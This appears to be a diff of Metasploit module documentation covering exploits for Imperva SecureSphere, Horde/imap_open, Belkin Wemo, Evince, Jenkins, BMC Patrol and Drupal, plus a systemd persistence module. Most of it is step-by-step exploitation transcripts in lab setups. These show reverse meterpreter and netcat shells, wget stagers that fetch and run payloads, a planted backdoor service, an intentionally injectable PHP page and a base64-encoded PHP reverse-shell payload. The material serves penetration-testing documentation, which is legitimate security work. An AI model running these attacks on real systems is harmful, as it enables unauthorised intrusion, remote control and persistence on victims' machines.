+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASS                        no        Agent registration password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.146.201  yes       The target address range or CIDR identifier
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Use SSL
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pws/impcli      no        The URI path to impcli
+   TIMEOUT    3                no        HTTP connection timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USER       imperva          no        Agent registration username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.146.215  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Imperva SecureSphere 13.0/13.1/13.2
+
+
+msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.215:4444
+[*] Sending payload linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (816260 bytes) to 192.168.146.201
+[*] Command Stager progress - 100.00% done (1321/1321 bytes)
+
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 4965 created.
+Channel 1 created.
+id
+uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
+/sbin/ifconfig
+eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
+          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
+          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:1331 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:825 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:1790319 (1.7 MiB)  TX bytes:83116 (81.1 KiB)
+
+lo        Link encap:Local Loopback
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.146.201 - Meterpreter session 1 closed.  Reason: User exit
+```
+
+Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):
+```
+msf5 > use exploit/linux/http/imperva_securesphere_exec
+msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
+RHOST => 192.168.146.201
+msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
+PASS => lshy5782%lsLS
+msf5 exploit(linux/http/imperva_securesphere_exec) > check
+[+] 192.168.146.201:443 The target is vulnerable.
+msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
+LHOST => 192.168.146.215
+msf5 exploit(linux/http/imperva_securesphere_exec) > show options
+
+Module options (exploit/linux/http/imperva_securesphere_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASS       lshy5782%lsLS    no        Agent registration password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.146.201  yes       The target address range or CIDR identifier
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Use SSL
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pws/impcli      no        The URI path to impcli
+   TIMEOUT    3                no        HTTP connection timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USER       imperva          no        Agent registration username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.146.215  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Imperva SecureSphere 13.0/13.1/13.2
+
+
+msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.215:4444
+[*] Sending payload linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (816260 bytes) to 192.168.146.201
+[*] Command Stager progress - 100.00% done (1321/1321 bytes)
+
+meterpreter > sysinfo
+Computer     : 192.168.146.201
+OS           : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 19634 created.
+Channel 1 created.
+id
+uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
+/sbin/ifconfig
+eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
+          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
+          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:651 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:451 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:894174 (873.2 KiB)  TX bytes:37181 (36.3 KiB)
+
+lo        Link encap:Local Loopback
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:153 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:153 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:21579 (21.0 KiB)  TX bytes:21579 (21.0 KiB)
+
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.146.201 - Meterpreter session 1 closed.  Reason: User exit
+```
@@ -10,6 +10,7 @@
 * [prestashop](https://github.com/PrestaShop/PrestaShop/blob/0d53d6b58b951ac364ad44671cf1ae9bf7ab6aed/controllers/admin/AdminCustomerThreadsController.php#L1010)
 * [SuiteCRM](https://github.com/salesagility/SuiteCRM/blob/153b2bae76097cdba9fc9c025bcd829a702b8687/modules/InboundEmail/EditView.php#L260)
 * [e107 v2](https://github.com/e107inc/e107/blob/7570b7ce4e17c03e9759c90889db8e750d566e53/e107_handlers/pop_bounce_handler.php#L83)
+* Horde IMP H3

  Prestashop exploitation requires the admin URI, and administrator credentials.

@@ -17,6 +18,8 @@

  e107 v2 exploitation requires administrator credentials.

+  Horde IMP H3 requires the IMP test page to be present (default), but no credentials are required.
+
  Additional applications were reported vulnerable, but exploits were not written. See [#10987](https://github.com/rapid7/metasploit-framework/pull/10987) for additional details.

 ### Prestashop 1.7.2.4 on Ubuntu 16.04
@@ -211,18 +214,69 @@ sudo systemctl restart mysql.server
 sudo systemctl restart mysql.service
 ```

+### Horde IMP H3 on Ubuntu 16.04
+
+This worked until about Jan 11, 2019 when ondrej updated php5.6 passed 38.
+
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+sudo apt-get --no-install-recommends install -y php-pear
+sudo apt-get install -y php5.6 libapache2-mod-php5.6 php5.6-mysql php5.6-mbstring php5.6-mysql php5.6-curl php5.6-xml php5.6-xmlrpc php5.6-imap
+sudo update-alternatives --config php
+sudo a2enmod  php5.6
+sudo a2dismod php7.1
+sudo phpenmod imap
+sudo service apache2 restart
+wget ftp://ftp.horde.org/pub/imp/imp-h3-4.2.tar.gz
+wget ftp://ftp.horde.org/pub/horde/horde-3.3.13.tar.gz
+tar zxf horde-3.3.13.tar.gz
+sudo mv horde-3.3.13 /var/www/html/
+tar zxf imp-h3-4.2.tar.gz
+sudo mv imp-h3-4.2 /var/www/html/horde-3.3.13/
+sudo mv /var/www/html/horde-3.3.13/ /var/www/html/horde
+cd /var/www/html/horde
+sudo mv imp-h3-4.2/ imp
+cd imp/config
+sudo cp mime_drivers.php.dist mime_drivers.php
+sudo cp prefs.php.dist prefs.php
+sudo cp servers.php.dist servers.php
+sudo chown -R www-data:www-data /var/www/html/horde/
+curl -s http://127.0.0.1/horde/imp/test.php | grep "PHP Mail Server Support Test"
+```
+
+Browse to the site, click Administration -> Setup.  Click the caution and stop icons and then "Generate Horde Configuration", and "Generate Mail Configuration".
+The test page is located at `/horde/imp/test.php`.
+
 ### Custom Page on Ubuntu 16.04

 Make sure `php-imap` is installed and enabled.  Create `imap.php` with the following content.

-```
+```php
 <html>
  <body>
-    <p>imap_open example exploitation page.  Use URL parameter 'server'.  Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</p>
+    <h1>imap_open Exploitable Page</h1>
+    <p>There are two ways to exploit this page:</p>
+    <ol>
+      <li><b>GET:</b> Use URL parameter 'server'.  Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</li>
+      <li><b>POST: </b> Using parameter 'server' or the form below.</li>
+    </ol>
+    <form method="post">
+      Server: <input type="text" name="server"><br>
+      <input type="submit" value="Submit">
+    </form>
 <?php
-  $server = htmlspecialchars($_GET["server"]);
+  if (isset($_GET["server"]) && !empty($_GET["server"])) {
+    $server = htmlspecialchars($_GET["server"]);
+  } else {
+    $server = $_POST["server"];
+  }
+  if (!isset($server) || empty($server)) {
+    exit;
+  }
+  echo "<hr><h2>Results:</h2>";
  $mbox = @imap_open("{".$server.":143}INBOX",'username','password');
-  echo '<p>Received: '.$server.'</p>';
+  echo '<p><b>Received: </b>'.$server.'</p>';

  $errors = imap_errors();
  if (is_array($errors)) {
@@ -236,7 +290,7 @@ Make sure `php-imap` is installed and enabled.  Create `imap.php` with the follo
    $str_errors = rtrim(trim($str_errors), ',');
  }
  if (!$mbox) {
-    echo '<p>Errors: ' . ($str_errors);
+    echo '<p><b>Errors: </b>' . ($str_errors);
  }
 ?>

@@ -5,9 +5,10 @@
 1. Kali 2.0 (System V)
 2. Ubuntu 14.04 (Upstart)
 3. Ubuntu 16.04 (systemd)
-4. Centos 5 (System V)
-5. Fedora 18 (systemd)
-6. Fedora 20 (systemd)
+4. Ubuntu 16.04 (systemd user)
+5. Centos 5 (System V)
+6. Fedora 18 (systemd)
+7. Fedora 20 (systemd)

 ## Verification Steps

@@ -36,7 +37,7 @@
 0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
 1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot).  This logs to syslog or /var/log/<process>.log and .err
 2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
-3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever.
+3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.

 **SHELLPATH**
  
@@ -252,3 +253,53 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
    [*] Started reverse handler on 192.168.199.128:4444 
    [*] Starting the payload handler...
    [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
+
+### systemd user (Ubuntu 16.04 Server - vagrant)
+
+    msf5 exploit(linux/local/service_persistence) > options
+
+    Module options (exploit/linux/local/service_persistence):
+
+       Name        Current Setting  Required  Description
+       ----        ---------------  --------  -----------
+       SERVICE                      no        Name of service to create
+       SESSION     -1               yes       The session to run this module on.
+       SHELLPATH   /tmp             yes       Writable path to put our shell
+       SHELL_NAME                   no        Name of shell file to write
+
+
+    Payload options (cmd/unix/reverse_netcat):
+
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+
+
+    Exploit target:
+
+       Id  Name
+       --  ----
+       4   systemd user
+
+
+    msf5 exploit(linux/local/service_persistence) > run
+
+    [!] SESSION may not be compatible with this module.
+    [*] Started reverse TCP handler on 172.28.128.1:4444
+    [*] Writing backdoor to /tmp/PPpCF
+    [*] Max line length is 65537
+    [*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
+    [*] Creating user service directory
+    [*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
+    [*] Max line length is 65537
+    [*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
+    [*] Reloading manager configuration
+    [*] Enabling service
+    [*] Starting service: OzzdRBC
+    [*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600
+
+    id
+    uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
+    uname -a
+    Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
@@ -0,0 +1,59 @@
+## Intro
+
+This module exploits a command injection in the Belkin Wemo UPnP API via
+the `SmartDevURL` argument to the `SetSmartDevInfo` action.
+
+This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
+devices are known to be affected, albeit on a different `RPORT` (49153).
+
+## Setup
+
+You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Unix In-Memory
+1   Linux Dropper
+```
+
+## Options
+
+**RPORT**
+
+Set this to the Wemo device's UPnP port. In our testing, this was 49152
+for Crock-Pot and 49153 for other devices.
+
+## Usage
+
+```
+msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
+
+[*] Started reverse TCP handler on 10.22.22.4:4444
+[+] Wemo-enabled device detected
+[*] Found firmware version: 2.00.6461
+[+] Firmware version 2.00.6461 < 2.00.8643
+[*] 10.22.22.1:49152 - The target appears to be vulnerable.
+[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
+[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
+[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
+[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P
+[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6
+[*] Sending payload to 10.22.22.1 (Wget)
+[*] Transmitting intermediate stager...(164 bytes)
+[*] Sending stage (1252312 bytes) to 10.22.22.1
+[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 10.22.22.1
+OS           :  (Linux 2.6.21)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter >
+```
@@ -0,0 +1,83 @@
+## Description
+
+  This module exploits a command injection vulnerability in Evince
+  before version 3.24.1 when opening comic book `.cbt` files.
+
+  Some file manager software, such as Nautilus and Atril, may allow
+  automatic exploitation without user interaction due to thumbnailer
+  preview functionality.
+
+  Note that limited space is available for the payload (<256 bytes).
+  Reverse Bash and Reverse Netcat payloads should be sufficiently small.
+
+
+## Vulnerable Application
+
+  [Evince](https://wiki.gnome.org/Apps/Evince) is a document viewer
+  for multiple document formats.
+
+  This module has been tested successfully on evince versions:
+
+  * 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6
+  * 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04
+
+
+## Verification Steps
+
+  1. ```use exploit/multi/fileformat/evince_cbt_cmd_injection```
+  2. ```set PAYLOAD <PAYLOAD>```
+  3. ```run```
+  4. The module should generate the malicious `msf.cbt` file
+  5. ```handler -p <PAYLOAD> -H <LHOST> -P <LPORT>```
+  6. Copy `msf.cbt` to target host and open with Evince
+  7. You should receive a new session
+
+
+## Options
+
+  **FILENAME**
+
+  The cbt document file name (default: `msf.cbt`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection 
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash
+  payload => cmd/unix/reverse_bash
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run
+
+  [*] Writing file: msf.cbt (1078272 bytes) ...
+  [+] msf.cbt stored at /root/.msf4/local/msf.cbt
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www
+  [*] exec: mv /root/.msf4/local/msf.cbt /var/www
+
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler 
+  msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash
+  payload => cmd/unix/reverse_bash
+  msf5 exploit(multi/handler) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.160:39362) at 2019-02-03 00:16:59 -0500
+
+  id
+  uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
+  uname -a
+  Linux ubuntu-16-04-x64 4.4.0-140-generic #166-Ubuntu SMP Wed Nov 14 20:09:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+  ```
+
+
+## Manual Cleanup
+
+To prevent re-exploitation from a thumbnailer process:
+
+  ```
+  /usr/bin/killall evince-thumbnailer
+  /usr/bin/killall atril-thumbnailer
+  ```
+
@@ -0,0 +1,76 @@
+## Intro
+
+This module exploits a vulnerability in Jenkins dynamic routing to
+bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
+download and execute a malicious JAR file.
+
+The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
+on later versions of Jenkins.
+
+Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
+
+## Setup
+
+1. `git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc`
+2. `cd cve-2019-1003000-jenkins-rce-poc/sample-vuln`
+3. Edit `run.sh` and change `2.152-alpine` to `2.137`
+4. `./run.sh`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)
+```
+
+## Options
+
+**RPORT**
+
+Set this to the Jenkins port. The default is 8080.
+
+**TARGETURI**
+
+Set this to the Jenkins base path. The default is `/`.
+
+**SRVPORT**
+
+Set this to the port on which to serve the payload. Change it from 8080
+to something like 8081 if you are testing Jenkins locally on port 8080.
+
+**ForceExploit**
+
+Set this to `true` to override the `check` result during exploitation.
+
+## Usage
+
+```
+msf5 exploit(multi/http/jenkins_metaprogramming) > run
+
+[*] Started HTTPS reverse handler on https://192.168.1.2:8443
+[*] Jenkins 2.137 detected
+[+] Jenkins 2.137 is a supported target
+[+] ACL bypass successful
+[*] Using URL: http://0.0.0.0:8081/
+[*] Local IP: http://192.168.1.2:8081/
+[*] Sending Jenkins and Groovy go-go-gadgets
+[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
+[-] Sending 404
+[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
+[+] Sending 200
+[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
+[+] Sending payload JAR
+[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
+[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target
+
+meterpreter > getuid
+Server username: jenkins
+meterpreter > sysinfo
+Computer    : 6f21b8da2915
+OS          : Linux 4.9.93-linuxkit-aufs (amd64)
+Meterpreter : java/linux
+meterpreter >
+```
@@ -0,0 +1,94 @@
+## Description
+This module exploits the lack of proper authorization checks in the BMC Patrol Agent that allows arbitrary operating system commands to be executed at a higher privilege level than the user being authenticated. The module is simply a ruby implementation of the remote protocol provided by BMC Patrol Agent to execute system commands.
+
+The vulnerability was identified by Ryan Wincey of [Securifera](https://www.securifera.com/) and was assigned [CVE-2018-20735](https://www.cvedetails.com/cve/CVE-2018-20735/) Further details can be found at the [Securifera website](https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/).
+
+
+## Vulnerable Application
+The module affects the BMC Patrol Agent component of [BMC TrueSight Infrastructure Management](https://docs.bmc.com/docs/TSInfrastructure/113/home-774795879.html). The agent is installed on servers managed using BMC TrueSight Infrastructure Management and listens on TCP port 3181. The vulnerability affects versions up to 11.3.
+
+## Verification Steps
+To use this exploit you will need access to BMC Patrol Agent.
+
+1. Install the BMC Patrol agent on a host.
+2. Ensure that the PatrolAgent service is running and listening on TCP port 3181.
+3. Launch `msfconsole`.
+4. Load the module `use exploit/multi/misc/bmc_patrol_cmd_exec`.
+5. Set the username to authenticate with `set USER patrol`.
+6. Set the password for the user `set PASSWORD password`.
+7. Set the command to execute `set CMD "whoami"`.
+8. Run the exploit `exploit`.
+
+The result should be that the string `nt authority\system` is returned and output.
+
+## Usage Scenarios
+The exploit module contains several targets as detailed below.
+
+### Target 0: Windows Powershell Injected Shellcode
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
+
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec 
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
+	RHOSTS => 192.168.162.133
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
+	LHOST => 192.168.162.128
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp
+	payload => windows/meterpreter/reverse_tcp
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
+	USER => user
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
+	[*] Exploit running as background job 0.
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > 
+	[*] Started reverse TCP handler on 192.168.162.128:4444 
+	[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.133:3181 - Successfully authenticated user.
+	[*] Sending stage (179779 bytes) to 192.168.162.133
+	[*] Meterpreter session 1 opened (192.168.162.128:4444 -> 192.168.162.133:58461) at 2019-02-10 23:00:03 -0500
+
+
+### Target 1: Generic Cmd
+This target can be used with *cmd* payloads to execute operating system commands against the target host.
+
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec 
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130
+	RHOSTS => 192.168.162.130
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
+	LHOST => 192.168.162.128
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol
+	USER => patrol
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1
+	TARGET => 1
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat
+	PAYLOAD => cmd/unix/reverse_netcat
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
+	[*] Exploit running as background job 0.
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > 
+	[*] Started reverse TCP handler on 192.168.162.128:4444 
+	[*] 192.168.162.130:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.130:3181 - Successfully authenticated user.
+	[*] Command shell session 1 opened (192.168.162.128:4444 -> 192.168.162.130:57408) at 2019-02-10 23:05:12 -0500
+
+
+### Target Cmd Execution: Windows/Unix/Linux
+This target isn't a formal target. It was added to allow a user to execute commands entirely through the Patrol Agent remote administration feature and view the output. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0.
+	
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
+	RHOSTS => 192.168.162.133
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
+	USER => user
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit
+	[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.133:3181 - Successfully authenticated user.
+	[*] 192.168.162.133:3181 - Command to execute: whoami
+	[*] 192.168.162.133:3181 - Output:
+	nt authority\system
+
+
@@ -89,6 +89,7 @@ msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check
 [*] Drupal 7 targeted at http://172.17.0.3/
 [+] Drupal appears unpatched in CHANGELOG.txt
 [*] Executing with printf(): sdHl4fLONOKfVZL1cEvXuJCuSkue
+[+] Drupal is vulnerable to code execution
 [+] 172.17.0.3:80 The target is vulnerable.
 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

@@ -96,6 +97,7 @@ msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
 [*] Drupal 7 targeted at http://172.17.0.3/
 [+] Drupal appears unpatched in CHANGELOG.txt
 [*] Executing with printf(): paAHBb9jyovEnLrrT5lMIB
+[+] Drupal is vulnerable to code execution
 [*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzd